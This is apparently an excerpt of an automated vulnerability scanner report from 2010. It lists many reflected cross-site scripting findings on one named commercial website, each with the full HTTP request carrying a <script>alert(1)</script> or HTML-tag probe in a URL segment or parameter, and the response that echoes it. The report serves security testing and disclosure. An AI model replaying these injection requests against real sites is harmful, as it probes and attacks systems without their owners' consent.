<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15e2520<script>alert(1)</script>e033b2f823d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1278. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbfb8<script>alert(1)</script>edcf34c5fda was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesdbfb8<script>alert(1)</script>edcf34c5fda/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesdbfb8<script>alert(1)</script>edcf34c5fda/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1279. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f34<script>alert(1)</script>4763ec48b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos28f34<script>alert(1)</script>4763ec48b1e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos28f34<script>alert(1)</script>4763ec48b1e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1280. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1bf2<script>alert(1)</script>c639c876438 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/search.phpa1bf2<script>alert(1)</script>c639c876438?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.phpa1bf2<script>alert(1)</script>c639c876438?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1281. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fa299<a>ae51feab1a2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Searchfa299<a>ae51feab1a2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Searchfa299<a>ae51feab1a2&opt=2 was not found on this server.</p>
...[SNIP]...

2.1282. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7f1e8<a>98342fb0375 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...7f1e8<a>98342fb0375&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...7f1e8<a>98342fb0375&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1283. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3bb09<script>alert(1)</script>eecb0857e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3bb09<script>alert(1)</script>eecb0857e32=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3bb09<script>alert(1)</script>eecb0857e32=1 was not found on this server.</p>
...[SNIP]...

2.1284. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 84fb0<a>e5db80ab1fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=284fb0<a>e5db80ab1fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=284fb0<a>e5db80ab1fb was not found on this server.</p>
...[SNIP]...

2.1285. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dd74<script>alert(1)</script>d8286ae79d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dd74<script>alert(1)</script>d8286ae79d7/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dd74<script>alert(1)</script>d8286ae79d7/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1286. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3249b<script>alert(1)</script>f48ada90573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/153249b<script>alert(1)</script>f48ada90573/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/153249b<script>alert(1)</script>f48ada90573/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1287. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 72eed<script>alert(1)</script>b732159e07c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes72eed<script>alert(1)</script>b732159e07c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes72eed<script>alert(1)</script>b732159e07c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1288. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb420<script>alert(1)</script>6951b53e135 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/search.phpbb420<script>alert(1)</script>6951b53e135?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.phpbb420<script>alert(1)</script>6951b53e135?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1289. http://www.resellerbase.com/detail/15/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f7b02<a>7ce5ee6f25b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Searchf7b02<a>7ce5ee6f25b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Searchf7b02<a>7ce5ee6f25b&opt=2 was not found on this server.</p>
...[SNIP]...

2.1290. http://www.resellerbase.com/detail/15/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e52a1<a>720e7c3b8b7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...e52a1<a>720e7c3b8b7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...e52a1<a>720e7c3b8b7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1291. http://www.resellerbase.com/detail/15/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 19198<script>alert(1)</script>66f016d078a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2&19198<script>alert(1)</script>66f016d078a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2&19198<script>alert(1)</script>66f016d078a=1 was not found on this server.</p>
...[SNIP]...

2.1292. http://www.resellerbase.com/detail/15/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5adfe<a>faf0919be86 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=25adfe<a>faf0919be86 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=25adfe<a>faf0919be86 was not found on this server.</p>
...[SNIP]...

2.1293. http://www.resellerbase.com/detail/16/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d54fa<script>alert(1)</script>74d0697652d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild54fa<script>alert(1)</script>74d0697652d/16/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild54fa<script>alert(1)</script>74d0697652d/16/ was not found on this server.</p>
...[SNIP]...

2.1294. http://www.resellerbase.com/detail/16/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db2be<script>alert(1)</script>74c70b752e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16db2be<script>alert(1)</script>74c70b752e9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16db2be<script>alert(1)</script>74c70b752e9/ was not found on this server.</p>
...[SNIP]...

2.1295. http://www.resellerbase.com/detail/16/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef368<script>alert(1)</script>9d2cd536c35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/?ef368<script>alert(1)</script>9d2cd536c35=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/?ef368<script>alert(1)</script>9d2cd536c35=1 was not found on this server.</p>
...[SNIP]...

2.1296. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a292f<script>alert(1)</script>ea43a5b7aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

